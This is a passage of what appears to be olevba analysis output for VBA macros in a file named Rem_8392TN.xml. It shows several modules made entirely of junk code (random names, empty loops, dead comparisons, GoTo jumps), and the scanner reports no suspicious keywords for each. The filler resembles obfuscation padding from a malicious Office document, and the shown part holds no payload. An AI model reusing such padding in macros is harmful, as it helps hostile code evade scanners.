  822. If "wGvhqdRwtc" = "UfxcfEjSzd" Then End
  823.  
  824. Dim JuSghYBkPj As Integer
  825. JuSghYBkPj = 8:
  826. Do While JuSghYBkPj < 6
  827.    DoEvents: JuSghYBkPj = JuSghYBkPj + 1
  828. Loop
  829.  
  830. If "wZrVygUtbw" = "YUgVKJAueA" Then End
  831.  
  832. GoTo ChZySsGKqe
  833. ChZySsGKqe:
  834.  
  835. Dim QZFZxuEcOf As Integer
  836. QZFZxuEcOf = 5:
  837. Do While QZFZxuEcOf < 9
  838.    DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
  839. Loop
  840.  
  841. If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
  842.  
  843. Dim PcVDFgCoDs As Long
  844. PcVDFgCoDs = "8147":
  845.  
  846. Dim cNIdkpHHat As Long
  847. cNIdkpHHat = "3146":
  848.  
  849. End Sub
  850.  
  851. Private Function GMTKslnBuTQZxjUgjhnPWHImrPEluFolgWBBa()
  852.  
  853. GoTo IXdDlNokXe
  854. IXdDlNokXe:
  855.  
  856. GoTo TjLVjlsYiP
  857. TjLVjlsYiP:
  858.  
  859. GoTo CpaAOFngiv
  860. CpaAOFngiv:
  861.  
  862. GoTo OLuTEPbxvb
  863. OLuTEPbxvb:
  864.  
  865. If "rCWamKyzpA" = "cgbRvWVxJm" Then End
  866.  
  867. GoTo fMltvwsFmJ
  868. fMltvwsFmJ:
  869.  
  870. Dim TdrUBZqxKK As Long
  871. TdrUBZqxKK = "5153":
  872.  
  873. Dim IwGvhqdRwt As Integer
  874. IwGvhqdRwt = 1:
  875. Do While IwGvhqdRwt < 26
  876.    DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
  877. Loop
  878.  
  879. End Function
  880.  
  881. Private Sub TLQTRXfNqrWIfUVloYcwmkkKMFIMUhHPKlhti()
  882.  
  883. GoTo eAvChZySsG
  884. eAvChZySsG:
  885.  
  886. Dim qeoEQZFZxu As Long
  887. qeoEQZFZxu = "8022":
  888.  
  889. GoTo OfLOMSaBlm
  890. OfLOMSaBlm:
  891.  
  892. Dim DtIQGjTXrh As Long
  893. DtIQGjTXrh = "6529":
  894.  
  895. GoTo eHLncVDFgC
  896. eHLncVDFgC:
  897.  
  898. GoTo DskicNIdkp
  899. DskicNIdkp:
  900.  
  901. Dim HatHsyGwFY As Integer
  902. HatHsyGwFY = 1:
  903. Do While HatHsyGwFY < 9
  904.    DoEvents: HatHsyGwFY = HatHsyGwFY + 1
  905. Loop
  906.  
  907. If "GDMkWHTWUA" = "bJUuZEbqYh" Then End
  908.  
  909. End Sub
  910.  
  911. Private Function FolgWBBaDVrVkRqyaCxKrOGXYiwZGLvcWPDOn()
  912.  
  913. Dim giviOLuTEP As Integer
  914. giviOLuTEP = 3:
  915. Do While giviOLuTEP < 6
  916.    DoEvents: giviOLuTEP = giviOLuTEP + 1
  917. Loop
  918.  
  919. Dim bKrCWamKyz As Long
  920. bKrCWamKyz = "6521":
  921.  
  922. If "cgbRvWVxJm" = "QfMltvwsFm" Then End
  923.  
  924. Dim BSTdrUBZqx As Long
  925. BSTdrUBZqx = "3405":
  926.  
  927. If "xCIwGvhqdR" = "wtcUfxcfEj" Then End
  928.  
  929. Dim zdEJuSghYB As Integer
  930. zdEJuSghYB = 9:
  931. Do While zdEJuSghYB < 24
  932.    DoEvents: zdEJuSghYB = zdEJuSghYB + 1
  933. Loop
  934.  
  935. If "zXXwZrVygU" = "tbwYUgVKJA" Then End
  936.  
  937. GoTo AvChZySsGK
  938. AvChZySsGK:
  939.  
  940. End Function
  941.  
  942. Public Function ESCRdmSmLIRpbTYbZfnOyzeQHVdtwgkFVssSu()
  943.  
  944. If "PcVDFgCoDs" = "kicNIdkpHH" Then End
  945.  
  946. If "HsyGwFYANh" = "GDMkWHTWUA" Then End
  947.  
  948. GoTo yTJnnNpIeI
  949. yTJnnNpIeI:
  950.  
  951. If "dDlNokXeaT" = "jLVjlsYiPi" Then End
  952.  
  953. If "aAOFngiviO" = "LuTEPbxvbK" Then End
  954.  
  955. If "CWamKyzpAc" = "gbRvWVxJmQ" Then End
  956.  
  957. If "MltvwsFmJB" = "STdrUBZqxK" Then End
  958.  
  959. Dim SzdEJuSghY As Integer
  960. SzdEJuSghY = 2:
  961. Do While SzdEJuSghY < 14
  962.    DoEvents: SzdEJuSghY = SzdEJuSghY + 1
  963. Loop
  964.  
  965. End Function
  966.  
  967. Private Sub cwmkkKMFIMUhHPKlhtixwnISNipuMMfGTxESC()
  968.  
  969. GoTo ZxuEcOfLOM
  970. ZxuEcOfLOM:
  971.  
  972. If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
  973.  
  974. Dim atHsyGwFYA As Long
  975. atHsyGwFYA = "2770":
  976.  
  977. GoTo rByTJnnNpI
  978. rByTJnnNpI:
  979.  
  980. Dim aTjLVjlsYi As Long
  981. aTjLVjlsYi = "6019":
  982.  
  983. Dim iOLuTEPbxv As Integer
  984. iOLuTEPbxv = 4:
  985. Do While iOLuTEPbxv < 24
  986.    DoEvents: iOLuTEPbxv = iOLuTEPbxv + 1
  987. Loop
  988.  
  989. GoTo KKxCIwGvhq
  990. KKxCIwGvhq:
  991.  
  992. Dim RwtcUfxcfE As Long
  993. RwtcUfxcfE = "5274":
  994.  
  995. End Sub
  996.  
  997. Private Function fNqrWIfUVloYcwmkkKMFIMUhHPKlhtixwnISN()
  998.  
  999. Dim ZySsGKqeoE As Long
  1000. ZySsGKqeoE = "3029":
  1001.  
  1002. GoTo SaBlmRDtIQ
  1003. SaBlmRDtIQ:
  1004.  
  1005. Dim ncVDFgCoDs As Integer
  1006. ncVDFgCoDs = 8:
  1007. Do While ncVDFgCoDs < 13
  1008.    DoEvents: ncVDFgCoDs = ncVDFgCoDs + 1
  1009. Loop
  1010.  
  1011. Dim IdkpHHatHs As Integer
  1012. IdkpHHatHs = 7:
  1013. Do While IdkpHHatHs < 13
  1014.    DoEvents: IdkpHHatHs = IdkpHHatHs + 1
  1015. Loop
  1016.  
  1017. Dim FYANhGDMkW As Integer
  1018. FYANhGDMkW = 1:
  1019. Do While FYANhGDMkW < 15
  1020.    DoEvents: FYANhGDMkW = FYANhGDMkW + 1
  1021. Loop
  1022.  
  1023. Dim UAbJUuZEbq As Integer
  1024. UAbJUuZEbq = 8:
  1025. Do While UAbJUuZEbq < 19
  1026.    DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
  1027. Loop
  1028.  
  1029. GoTo ByTJnnNpIe
  1030. ByTJnnNpIe:
  1031.  
  1032. GoTo XdDlNokXea
  1033. XdDlNokXea:
  1034.  
  1035. End Function
  1036.  
  1037. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1038. ANALYSIS:
  1039. No suspicious keyword or IOC found.
  1040. -------------------------------------------------------------------------------
  1041. VBA MACRO Module3.bas
  1042. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  1043. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1044. Private Function oDfMRCicVJUthYHACPChenmxiuRPudkVPUGdS()
  1045.  
  1046. Dim ZDxnSsrUfJ As Integer
  1047. ZDxnSsrUfJ = 2:
  1048. Do While ZDxnSsrUfJ < 3
  1049.    DoEvents: ZDxnSsrUfJ = ZDxnSsrUfJ + 1
  1050. Loop
  1051.  
  1052. If "IQSTPbJfxo" = "pAOqxvNtgg" Then End
  1053.  
  1054. GoTo yescSENAnT
  1055. yescSENAnT:
  1056.  
  1057. Dim ZqCUZCAGoW As Long
  1058. ZqCUZCAGoW = "1147":
  1059.  
  1060. End Function
  1061.  
  1062. Private Sub xcOlabrueiDsqqpSLOranNVQrnAoEDtOYTovB()
  1063.  
  1064. Dim ocgNBLamvb As Integer
  1065. ocgNBLamvb = 9:
  1066. Do While ocgNBLamvb < 7
  1067.    DoEvents: ocgNBLamvb = ocgNBLamvb + 1
  1068. Loop
  1069.  
  1070. GoTo ZKChkioXxI
  1071. ZKChkioXxI:
  1072.  
  1073. If "nzQemcGptO" = "EbCBdWsWly" Then End
  1074.  
  1075. Dim zbcyLlHFZj As Integer
  1076. zbcyLlHFZj = 1:
  1077. Do While zbcyLlHFZj < 28
  1078.    DoEvents: zbcyLlHFZj = zbcyLlHFZj + 1
  1079. Loop
  1080.  
  1081. End Sub
  1082.  
  1083. Private Function EJaatNBMSZQyrtgBZWfEpampntVcNOsxVjrBL()
  1084.  
  1085. If "KKjMeBetAo" = "jLHtBXPGhr" Then End
  1086.  
  1087. GoTo IPuFlFyMXw
  1088. IPuFlFyMXw:
  1089.  
  1090. Dim KDFSFkhRpa As Integer
  1091. KDFSFkhRpa = 10:
  1092. Do While KDFSFkhRpa < 17
  1093.    DoEvents: KDFSFkhRpa = KDFSFkhRpa + 1
  1094. Loop
  1095.  
  1096. If "SYgnysXJGV" = "WMWZDxnSsr" Then End
  1097.  
  1098. End Function
  1099.  
  1100. Private Function RDGjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQ()
  1101.  
  1102. GoTo CUZCAGoWAa
  1103. CUZCAGoWAa:
  1104.  
  1105. If "oDEuxHLGWt" = "tTvORVDqQY" Then End
  1106.  
  1107. Dim qDrgfwRBwr As Integer
  1108. qDrgfwRBwr = 3:
  1109. Do While qDrgfwRBwr < 14
  1110.    DoEvents: qDrgfwRBwr = qDrgfwRBwr + 1
  1111. Loop
  1112.  
  1113. If "VoocgNBLam" = "vbvURaZKCh" Then End
  1114.  
  1115. End Function
  1116.  
  1117. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1118. ANALYSIS:
  1119. No suspicious keyword or IOC found.
  1120. -------------------------------------------------------------------------------
  1121. VBA MACRO Module4.bas
  1122. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module4'
  1123. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1124. Private Function kuCVoCNmBRATVIVBxHfqCOKIOWEoiNyWLMcmP()
  1125.  
  1126. Dim NnmPaEhXdD As Long
  1127. NnmPaEhXdD = "7864":
  1128.  
  1129. End Function
  1130.  
  1131. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1132. ANALYSIS:
  1133. No suspicious keyword or IOC found.
  1134. -------------------------------------------------------------------------------
  1135. VBA MACRO Module5.bas
  1136. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module5'
  1137. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1138. Private Sub zDmqLByyYBTpTivowYzvIwMECWgbwEJaatNBM()
  1139.  
  1140. Dim buwjdcziHs As Long
  1141. buwjdcziHs = "8519":
  1142.  
  1143. End Sub
  1144.  
  1145. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1146. ANALYSIS:
  1147. No suspicious keyword or IOC found.
  1148. -------------------------------------------------------------------------------
  1149. VBA MACRO Module6.bas
  1150. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module6'
  1151. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1152. Private Function SZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHgJ()
  1153.  
  1154. GoTo SyYGIjFrZv
  1155. SyYGIjFrZv:
  1156.  
  1157. Dim fQEgnsDKdw As Integer
  1158. fQEgnsDKdw = 6:
  1159. Do While fQEgnsDKdw < 6
  1160.    DoEvents: fQEgnsDKdw = fQEgnsDKdw + 1
  1161. Loop
  1162.  
  1163. Dim JbbdqdJGPn As Long
  1164. JbbdqdJGPn = "5222":
  1165.  
  1166. Dim wsqWeMXqvH As Integer
  1167. wsqWeMXqvH = 8:
  1168. Do While wsqWeMXqvH < 16
  1169.    DoEvents: wsqWeMXqvH = wsqWeMXqvH + 1
  1170. Loop
  1171.  
  1172. GoTo kuxbWMqqQs
  1173. kuxbWMqqQs:
  1174.  
  1175. GoTo hLAggoQrnA
  1176. hLAggoQrnA:
  1177.  
  1178. End Function
  1179.  
  1180. Private Sub GculmwLnUsKqddRVCpzPbKXkQNWnyqWZXDlTw()
  1181.  
  1182. GoTo NbcTWfjeUS
  1183. NbcTWfjeUS:
  1184.  
  1185. Dim RtMpTbPowr As Integer
  1186. RtMpTbPowr = 1:
  1187. Do While RtMpTbPowr < 1
  1188.    DoEvents: RtMpTbPowr = RtMpTbPowr + 1
  1189. Loop
  1190.  
  1191. If "pFEVpkQXCt" = "tNNaFlzJZL" Then End
  1192.  
  1193. If "UspyXiaGJH" = "mVvgHMxODk" Then End
  1194.  
  1195. If "OSmcAazCuR" = "ujXQYeXjYn" Then End
  1196.  
  1197. Dim DxIDyfkCbv As Integer
  1198. DxIDyfkCbv = 2:
  1199. Do While DxIDyfkCbv < 29
  1200.    DoEvents: DxIDyfkCbv = DxIDyfkCbv + 1
  1201. Loop
  1202.  
  1203. End Sub
  1204.  
  1205. Public Sub MSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHHg()
  1206.  
  1207. GoTo nefQEgnsDK
  1208. nefQEgnsDK:
  1209.  
  1210. Dim wkvVJbbdqd As Long
  1211. wkvVJbbdqd = "6334":
  1212.  
  1213. If "PnZKwsqWeM" = "XqvHetukux" Then End
  1214.  
  1215. Dim WMqqQsEhLA As Long
  1216. WMqqQsEhLA = "8220":
  1217.  
  1218. GoTo oQrnAhEWNO
  1219. oQrnAhEWNO:
  1220.  
  1221. Dim mPvUlSFFsX As Long
  1222. mPvUlSFFsX = "6710":
  1223.  
  1224. End Sub
  1225.  
  1226. Public Function pzPbKXkQNWnyqWZXDlTwxcOlabrueiDsqqpSL()
  1227.  
  1228. Dim PowrToBpFE As Integer
  1229. PowrToBpFE = 1:
  1230. Do While PowrToBpFE < 6
  1231.    DoEvents: PowrToBpFE = PowrToBpFE + 1
  1232. Loop
  1233.  
  1234. Dim uQXCttNNaF As Integer
  1235. uQXCttNNaF = 8:
  1236. Do While uQXCttNNaF < 22
  1237.    DoEvents: uQXCttNNaF = uQXCttNNaF + 1
  1238. Loop
  1239.  
  1240. Dim ZLUAUspyXi As Long
  1241. ZLUAUspyXi = "1337":
  1242.  
  1243. If "JHmVvgHMxO" = "DkBEOSmcAa" Then End
  1244.  
  1245. Dim CuRujXQYeX As Integer
  1246. CuRujXQYeX = 5:
  1247. Do While CuRujXQYeX < 2
  1248.    DoEvents: CuRujXQYeX = CuRujXQYeX + 1
  1249. Loop
  1250.  
  1251. Dim fDxIDyfkCb As Integer
  1252. fDxIDyfkCb = 3:
  1253. Do While fDxIDyfkCb < 16
  1254.    DoEvents: fDxIDyfkCb = fDxIDyfkCb + 1
  1255. Loop
  1256.  
  1257. End Function
  1258.  
  1259. Private Function BMSZQyrtgBZWfEpampntVcNOsxVjrBLurmcHH()
  1260.  
  1261. Dim ZDSyYGIjFr As Long
  1262. ZDSyYGIjFr = "8466":
  1263.  
  1264. Dim dwkvVJbbdq As Integer
  1265. dwkvVJbbdq = 5:
  1266. Do While dwkvVJbbdq < 19
  1267.    DoEvents: dwkvVJbbdq = dwkvVJbbdq + 1
  1268. Loop
  1269.  
  1270. Dim bWMqqQsEhL As Long
  1271. bWMqqQsEhL = "8843":
  1272.  
  1273. Dim goQrnAhEWN As Long
  1274. goQrnAhEWN = "2337":
  1275.  
  1276. Dim DRBqclylrO As Long
  1277. DRBqclylrO = "2721":
  1278.  
  1279. If "aSxayeNuYZ" = "dpNbcTWfje" Then End
  1280.  
  1281. End Function
  1282.  
  1283. Private Sub sqqpSLOranNVQrnAoEDtOYTovBSSllZdKxIXj()
  1284.  
  1285. If "spyXiaGJHm" = "VvgHMxODkB" Then End
  1286.  
  1287. Dim voCNtarATV As Long
  1288. voCNtarATV = "4335":
  1289.  
  1290. Dim YHfRbORPVw As Integer
  1291. YHfRbORPVw = 8:
  1292. Do While YHfRbORPVw < 10
  1293.    DoEvents: YHfRbORPVw = YHfRbORPVw + 1
  1294. Loop
  1295.  
  1296. GoTo UZwLTcmWTO
  1297. UZwLTcmWTO:
  1298.  
  1299. If "IihKcZDSyY" = "GIjFrZvnef" Then End
  1300.  
  1301. GoTo EgnsDKdwkv
  1302. EgnsDKdwkv:
  1303.  
  1304. End Sub
  1305.  
  1306. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1307. ANALYSIS:
  1308. No suspicious keyword or IOC found.
  1309. -------------------------------------------------------------------------------
  1310. VBA MACRO Module8.bas
  1311. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module8'
  1312. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1313. Public Sub XMNdNQUoeJjiLwAdsZyHJKGsaWofgqFhOmEkX()
  1314.  
  1315. Dim IwGvhqdRwt As Integer
  1316. IwGvhqdRwt = 1:
  1317. Do While IwGvhqdRwt < 26
  1318.    DoEvents: IwGvhqdRwt = IwGvhqdRwt + 1
  1319. Loop
  1320.  
  1321. Dim xcfEjSzdEJ As Long
  1322. xcfEjSzdEJ = "2523":
  1323.  
  1324. If "ghYBkPjzXX" = "wZrVygUtbw" Then End
  1325.  
  1326. Dim UgVKJAueAv As Integer
  1327. UgVKJAueAv = 6:
  1328. Do While UgVKJAueAv < 28
  1329.    DoEvents: UgVKJAueAv = UgVKJAueAv + 1
  1330. Loop
  1331.  
  1332. Dim ySsGKqeoEQ As Integer
  1333. ySsGKqeoEQ = 10:
  1334. Do While ySsGKqeoEQ < 23
  1335.    DoEvents: ySsGKqeoEQ = ySsGKqeoEQ + 1
  1336. Loop
  1337.  
  1338. Dim xuEcOfLOMS As Integer
  1339. xuEcOfLOMS = 10:
  1340. Do While xuEcOfLOMS < 22
  1341.    DoEvents: xuEcOfLOMS = xuEcOfLOMS + 1
  1342. Loop
  1343.  
  1344. Dim mRDtIQGjTX As Integer
  1345. mRDtIQGjTX = 5:
  1346. Do While mRDtIQGjTX < 28
  1347.    DoEvents: mRDtIQGjTX = mRDtIQGjTX + 1
  1348. Loop
  1349.  
  1350. Dim feHLncVDFg As Long
  1351. feHLncVDFg = "3899":
  1352.  
  1353. Dim DskicNIdkp As Integer
  1354. DskicNIdkp = 10:
  1355. Do While DskicNIdkp < 28
  1356.    DoEvents: DskicNIdkp = DskicNIdkp + 1
  1357. Loop
  1358.  
  1359. End Sub
  1360.  
  1361. Private Function OHuGMTKslnBuTQZxjUgjhnPWHImrPEluFolgW()
  1362.  
  1363. Dim pIeIXdDlNo As Integer
  1364. pIeIXdDlNo = 5:
  1365. Do While pIeIXdDlNo < 16
  1366.    DoEvents: pIeIXdDlNo = pIeIXdDlNo + 1
  1367. Loop
  1368.  
  1369. GoTo aTjLVjlsYi
  1370. aTjLVjlsYi:
  1371.  
  1372. If "iCpaAOFngi" = "viOLuTEPbx" Then End
  1373.  
  1374. Dim bKrCWamKyz As Long
  1375. bKrCWamKyz = "6521":
  1376.  
  1377. If "cgbRvWVxJm" = "QfMltvwsFm" Then End
  1378.  
  1379. Dim BSTdrUBZqx As Long
  1380. BSTdrUBZqx = "3405":
  1381.  
  1382. If "xCIwGvhqdR" = "wtcUfxcfEj" Then End
  1383.  
  1384. Dim zdEJuSghYB As Integer
  1385. zdEJuSghYB = 9:
  1386. Do While zdEJuSghYB < 24
  1387.    DoEvents: zdEJuSghYB = zdEJuSghYB + 1
  1388. Loop
  1389.  
  1390. If "zXXwZrVygU" = "tbwYUgVKJA" Then End
  1391.  
  1392. End Function
  1393.  
  1394. Private Sub ISNipuMMfGTxESCRdmSmLIRpbTYbZfnOyzeQH()
  1395.  
  1396. Dim jTXrhFfeHL As Long
  1397. jTXrhFfeHL = "5576":
  1398.  
  1399. If "DFgCoDskic" = "NIdkpHHatH" Then End
  1400.  
  1401. Dim GwFYANhGDM As Long
  1402. GwFYANhGDM = "7273":
  1403.  
  1404. Dim HTWUAbJUuZ As Integer
  1405. HTWUAbJUuZ = 5:
  1406. Do While HTWUAbJUuZ < 22
  1407.    DoEvents: HTWUAbJUuZ = HTWUAbJUuZ + 1
  1408. Loop
  1409.  
  1410. GoTo YhrByTJnnN
  1411. YhrByTJnnN:
  1412.  
  1413. GoTo IeIXdDlNok
  1414. IeIXdDlNok:
  1415.  
  1416. GoTo eaTjLVjlsY
  1417. eaTjLVjlsY:
  1418.  
  1419. Dim vbKrCWamKy As Long
  1420. vbKrCWamKy = "9276":
  1421.  
  1422. GoTo JBSTdrUBZq
  1423. JBSTdrUBZq:
  1424.  
  1425. End Sub
  1426.  
  1427. Public Function kXXLPvjtJVEReKHQhTLQTRXfNqrWIfUVloYcw()
  1428.  
  1429. If "wZrVygUtbw" = "YUgVKJAueA" Then End
  1430.  
  1431. GoTo ChZySsGKqe
  1432. ChZySsGKqe:
  1433.  
  1434. Dim QZFZxuEcOf As Integer
  1435. QZFZxuEcOf = 5:
  1436. Do While QZFZxuEcOf < 9
  1437.    DoEvents: QZFZxuEcOf = QZFZxuEcOf + 1
  1438. Loop
  1439.  
  1440. If "aBlmRDtIQG" = "jTXrhFfeHL" Then End
  1441.  
  1442. Dim PcVDFgCoDs As Long
  1443. PcVDFgCoDs = "8147":
  1444.  
  1445. Dim cNIdkpHHat As Long
  1446. cNIdkpHHat = "3146":
  1447.  
  1448. Dim yGwFYANhGD As Integer
  1449. yGwFYANhGD = 9:
  1450. Do While yGwFYANhGD < 23
  1451.    DoEvents: yGwFYANhGD = yGwFYANhGD + 1
  1452. Loop
  1453.  
  1454. If "HTWUAbJUuZ" = "EbqYhrByTJ" Then End
  1455.  
  1456. GoTo nNpIeIXdDl
  1457. nNpIeIXdDl:
  1458.  
  1459. End Function
  1460.  
  1461. Private Sub aCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcPLJ()
  1462.  
  1463. GoTo CWamKyzpAc
  1464. CWamKyzpAc:
  1465.  
  1466. GoTo bRvWVxJmQf
  1467. bRvWVxJmQf:
  1468.  
  1469. If "ltvwsFmJBS" = "TdrUBZqxKK" Then End
  1470.  
  1471. Dim CIwGvhqdRw As Long
  1472. CIwGvhqdRw = "7156":
  1473.  
  1474. GoTo UfxcfEjSzd
  1475. UfxcfEjSzd:
  1476.  
  1477. Dim JuSghYBkPj As Integer
  1478. JuSghYBkPj = 8:
  1479. Do While JuSghYBkPj < 6
  1480.    DoEvents: JuSghYBkPj = JuSghYBkPj + 1
  1481. Loop
  1482.  
  1483. If "wZrVygUtbw" = "YUgVKJAueA" Then End
  1484.  
  1485. GoTo oEQZFZxuEc
  1486. oEQZFZxuEc:
  1487.  
  1488. Dim OMSaBlmRDt As Integer
  1489. OMSaBlmRDt = 4:
  1490. Do While OMSaBlmRDt < 29
  1491.    DoEvents: OMSaBlmRDt = OMSaBlmRDt + 1
  1492. Loop
  1493.  
  1494. End Sub
  1495.  
  1496. Private Function twgkFVssSuNjNcpiqStpCqGxvQavRxDUUOHuG()
  1497.  
  1498. Dim FYANhGDMkW As Integer
  1499. FYANhGDMkW = 1:
  1500. Do While FYANhGDMkW < 15
  1501.    DoEvents: FYANhGDMkW = FYANhGDMkW + 1
  1502. Loop
  1503.  
  1504. Dim UAbJUuZEbq As Integer
  1505. UAbJUuZEbq = 8:
  1506. Do While UAbJUuZEbq < 19
  1507.    DoEvents: UAbJUuZEbq = UAbJUuZEbq + 1
  1508. Loop
  1509.  
  1510. GoTo ByTJnnNpIe
  1511. ByTJnnNpIe:
  1512.  
  1513. GoTo XdDlNokXea
  1514. XdDlNokXea:
  1515.  
  1516. Dim jLVjlsYiPi As Integer
  1517. jLVjlsYiPi = 2:
  1518. Do While jLVjlsYiPi < 20
  1519.    DoEvents: jLVjlsYiPi = jLVjlsYiPi + 1
  1520. Loop
  1521.  
  1522. GoTo AOFngiviOL
  1523. AOFngiviOL:
  1524.  
  1525. GoTo EPbxvbKrCW
  1526. EPbxvbKrCW:
  1527.  
  1528. GoTo mKyzpAcgbR
  1529. mKyzpAcgbR:
  1530.  
  1531. Dim WVxJmQfMlt As Long
  1532. WVxJmQfMlt = "2151":
  1533.  
  1534. End Function
  1535.  
  1536. Public Function KGsaWofgqFhOmEkXXLPvjtJVEReKHQhTLQTRX()
  1537.  
  1538. Dim ueAvChZySs As Integer
  1539. ueAvChZySs = 6:
  1540. Do While ueAvChZySs < 14
  1541.    DoEvents: ueAvChZySs = ueAvChZySs + 1
  1542. Loop
  1543.  
  1544. Dim eoEQZFZxuE As Long
  1545. eoEQZFZxuE = "6270":
  1546.  
  1547. GoTo fLOMSaBlmR
  1548. fLOMSaBlmR:
  1549.  
  1550. GoTo tIQGjTXrhF
  1551. tIQGjTXrhF:
  1552.  
  1553. Dim eHLncVDFgC As Integer
  1554. eHLncVDFgC = 3:
  1555. Do While eHLncVDFgC < 7
  1556.    DoEvents: eHLncVDFgC = eHLncVDFgC + 1
  1557. Loop
  1558.  
  1559. GoTo kicNIdkpHH
  1560. kicNIdkpHH:
  1561.  
  1562. If "HsyGwFYANh" = "GDMkWHTWUA" Then End
  1563.  
  1564. GoTo UuZEbqYhrB
  1565. UuZEbqYhrB:
  1566.  
  1567. Dim TJnnNpIeIX As Long
  1568. TJnnNpIeIX = "5651":
  1569.  
  1570. End Function
  1571.  
  1572. Private Function qyaCxKrOGXYiwZGLvcWPDOnbSBtvJWCyIgrcP()
  1573.  
  1574. GoTo gbRvWVxJmQ
  1575. gbRvWVxJmQ:
  1576.  
  1577. If "MltvwsFmJB" = "STdrUBZqxK" Then End
  1578.  
  1579. Dim SzdEJuSghY As Integer
  1580. SzdEJuSghY = 2:
  1581. Do While SzdEJuSghY < 14
  1582.    DoEvents: SzdEJuSghY = SzdEJuSghY + 1
  1583. Loop
  1584.  
  1585. GoTo jzXXwZrVyg
  1586. jzXXwZrVyg:
  1587.  
  1588. GoTo GKqeoEQZFZ
  1589. GKqeoEQZFZ:
  1590.  
  1591. If "uEcOfLOMSa" = "BlmRDtIQGj" Then End
  1592.  
  1593. GoTo rhFfeHLncV
  1594. rhFfeHLncV:
  1595.  
  1596. If "FgCoDskicN" = "IdkpHHatHs" Then End
  1597.  
  1598. If "GwFYANhGDM" = "kWHTWUAbJU" Then End
  1599.  
  1600. End Function
  1601.  
  1602. Public Function ImrPEluFolgWBBaDVrVkRqyaCxKrOGXYiwZGL()
  1603.  
  1604. Dim CpaAOFngiv As Integer
  1605. CpaAOFngiv = 3:
  1606. Do While CpaAOFngiv < 24
  1607.    DoEvents: CpaAOFngiv = CpaAOFngiv + 1
  1608. Loop
  1609.  
  1610. GoTo amKyzpAcgb
  1611. amKyzpAcgb:
  1612.  
  1613. If "vWVxJmQfMl" = "tvwsFmJBST" Then End
  1614.  
  1615. GoTo rUBZqxKKxC
  1616. rUBZqxKKxC:
  1617.  
  1618. Dim wGvhqdRwtc As Long
  1619. wGvhqdRwtc = "9280":
  1620.  
  1621. Dim uSghYBkPjz As Integer
  1622. uSghYBkPjz = 6:
  1623. Do While uSghYBkPjz < 21
  1624.    DoEvents: uSghYBkPjz = uSghYBkPjz + 1
  1625. Loop
  1626.  
  1627. If "ZrVygUtbwY" = "UgVKJAueAv" Then End
  1628.  
  1629. Dim hZySsGKqeo As Long
  1630. hZySsGKqeo = "7148":
  1631.  
  1632. If "ZFZxuEcOfL" = "OMSaBlmRDt" Then End
  1633.  
  1634. End Function
  1635.  
  1636. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1637. ANALYSIS:
  1638. No suspicious keyword or IOC found.
  1639. -------------------------------------------------------------------------------
  1640. VBA MACRO Module9.bas
  1641. in file: Rem_8392TN.xml - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module9'
  1642. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  1643. Private Function GjyfFNoQMYGculmwLnUsKqddRVCpzPbKXkQNW()
  1644.  
  1645. If "xayeNuYZdp" = "NbcTWfjeUS" Then End
  1646.  
  1647. Dim RtMpTbPowr As Integer
  1648. RtMpTbPowr = 1:
  1649. Do While RtMpTbPowr < 1
  1650.    DoEvents: RtMpTbPowr = RtMpTbPowr + 1
  1651. Loop
  1652.  
  1653. If "pFEVpkQXCt" = "tNNaFlzJZL" Then End
  1654.  
  1655. If "UspyXiaGJH" = "mVvgHMxODk" Then End
  1656.  
  1657. If "OSmcAazCuR" = "ujXQYeXjYn" Then End
  1658.  
  1659. End Function
  1660.  
  1661. Public Sub ECWgbwEJaatNBMSZQyrtgBZWfEpampntVcNOs()
  1662.  
  1663. GoTo cmWTOdIihK
  1664. cmWTOdIihK:
  1665.  
  1666. GoTo ZDSyYGIjFr
  1667. ZDSyYGIjFr:
  1668.  
  1669. Dim vnefQEgnsD As Integer
  1670. vnefQEgnsD = 8:
  1671. Do While vnefQEgnsD < 23
  1672.    DoEvents: vnefQEgnsD = vnefQEgnsD + 1
  1673. Loop
  1674.  
  1675. Dim kvVJbbdqdJ As Long
  1676. kvVJbbdqdJ = "7718":
  1677.  
  1678. Dim nZKwsqWeMX As Long
  1679. nZKwsqWeMX = "3470":
  1680.  
  1681. End Sub
  1682.  
  1683. Private Sub UGdSsJTvAukPpoRDGjyfFNoQMYGculmwLnUsK()
  1684.  
  1685. Dim sXDRBqclyl As Long
  1686. sXDRBqclyl = "7338":
  1687.  
  1688. Dim PaSxayeNuY As Integer
  1689. PaSxayeNuY = 0:
  1690. Do While PaSxayeNuY < 13
  1691.    DoEvents: PaSxayeNuY = PaSxayeNuY + 1
  1692. Loop
  1693.  
  1694. Dim bcTWfjeUSS As Integer
  1695. bcTWfjeUSS = 8:
  1696. Do While bcTWfjeUSS < 22
  1697.    DoEvents: bcTWfjeUSS = bcTWfjeUSS + 1
  1698. Loop
